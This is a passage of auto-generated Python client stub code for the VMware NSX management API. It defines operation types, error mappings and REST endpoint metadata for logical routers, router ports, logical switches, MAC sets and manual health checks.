'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPort')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPort')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPortListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterPort')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.logical_router_ports',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _LogicalRoutersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'logical_router': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-routers',
request_body_parameter='logical_router',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'logical_router_id': type.StringType(),
'cascade_delete_linked_ports': type.OptionalType(type.BooleanType()),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/logical-routers/{logical-router-id}',
path_variables={
'logical_router_id': 'logical-router-id',
},
query_parameters={
'cascade_delete_linked_ports': 'cascade_delete_linked_ports',
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'logical_router_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-routers/{logical-router-id}',
path_variables={
'logical_router_id': 'logical-router-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'router_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-routers',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'router_type': 'router_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for reallocate operation
reallocate_input_type = type.StructType('operation-input', {
'logical_router_id': type.StringType(),
'service_router_allocation_config': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceRouterAllocationConfig'),
})
reallocate_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
reallocate_input_value_validator_list = [
HasFieldsOfValidator()
]
reallocate_output_validator_list = [
HasFieldsOfValidator()
]
reallocate_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-routers/{logical-router-id}?action=reallocate',
request_body_parameter='service_router_allocation_config',
path_variables={
'logical_router_id': 'logical-router-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for reprocess operation
reprocess_input_type = type.StructType('operation-input', {
'logical_router_id': type.StringType(),
})
reprocess_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
reprocess_input_value_validator_list = [
]
reprocess_output_validator_list = [
]
reprocess_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-routers/{logical-router-id}?action=reprocess',
path_variables={
'logical_router_id': 'logical-router-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'logical_router_id': type.StringType(),
'logical_router': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/logical-routers/{logical-router-id}',
request_body_parameter='logical_router',
path_variables={
'logical_router_id': 'logical-router-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouterListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'reallocate': {
'input_type': reallocate_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
'errors': reallocate_error_dict,
'input_value_validator_list': reallocate_input_value_validator_list,
'output_validator_list': reallocate_output_validator_list,
'task_type': TaskType.NONE,
},
'reprocess': {
'input_type': reprocess_input_type,
'output_type': type.VoidType(),
'errors': reprocess_error_dict,
'input_value_validator_list': reprocess_input_value_validator_list,
'output_validator_list': reprocess_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalRouter'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'reallocate': reallocate_rest_metadata,
'reprocess': reprocess_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.logical_routers',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _LogicalSwitchesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'logical_switch': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitch'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/logical-switches',
request_body_parameter='logical_switch',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'lswitch_id': type.StringType(),
'cascade': type.OptionalType(type.BooleanType()),
'detach': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/logical-switches/{lswitch-id}',
path_variables={
'lswitch_id': 'lswitch-id',
},
query_parameters={
'cascade': 'cascade',
'detach': 'detach',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'lswitch_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-switches/{lswitch-id}',
path_variables={
'lswitch_id': 'lswitch-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'diagnostic': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'switching_profile_id': type.OptionalType(type.StringType()),
'transport_type': type.OptionalType(type.StringType()),
'transport_zone_id': type.OptionalType(type.StringType()),
'uplink_teaming_policy_name': type.OptionalType(type.StringType()),
'vlan': type.OptionalType(type.IntegerType()),
'vni': type.OptionalType(type.IntegerType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/logical-switches',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'diagnostic': 'diagnostic',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'switching_profile_id': 'switching_profile_id',
'transport_type': 'transport_type',
'transport_zone_id': 'transport_zone_id',
'uplink_teaming_policy_name': 'uplink_teaming_policy_name',
'vlan': 'vlan',
'vni': 'vni',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'lswitch_id': type.StringType(),
'logical_switch': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitch'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/logical-switches/{lswitch-id}',
request_body_parameter='logical_switch',
path_variables={
'lswitch_id': 'lswitch-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitch'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitch'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitchListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'LogicalSwitch'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.logical_switches',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _MacSetsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'm_AC_set': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/mac-sets',
request_body_parameter='m_AC_set',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'mac_set_id': type.StringType(),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/mac-sets/{mac-set-id}',
path_variables={
'mac_set_id': 'mac-set-id',
},
query_parameters={
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'mac_set_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/mac-sets/{mac-set-id}',
path_variables={
'mac_set_id': 'mac-set-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/mac-sets',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'mac_set_id': type.StringType(),
'm_AC_set': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/mac-sets/{mac-set-id}',
request_body_parameter='m_AC_set',
path_variables={
'mac_set_id': 'mac-set-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSetListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.mac_sets',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ManualHealthChecksStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'manual_health_check': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/manual-health-checks',
request_body_parameter='manual_health_check',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'manual_health_check_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/manual-health-checks/{manual-health-check-id}',
path_variables={
'manual_health_check_id': 'manual-health-check-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'manual_health_check_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/manual-health-checks/{manual-health-check-id}',
path_variables={
'manual_health_check_id': 'manual-health-check-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
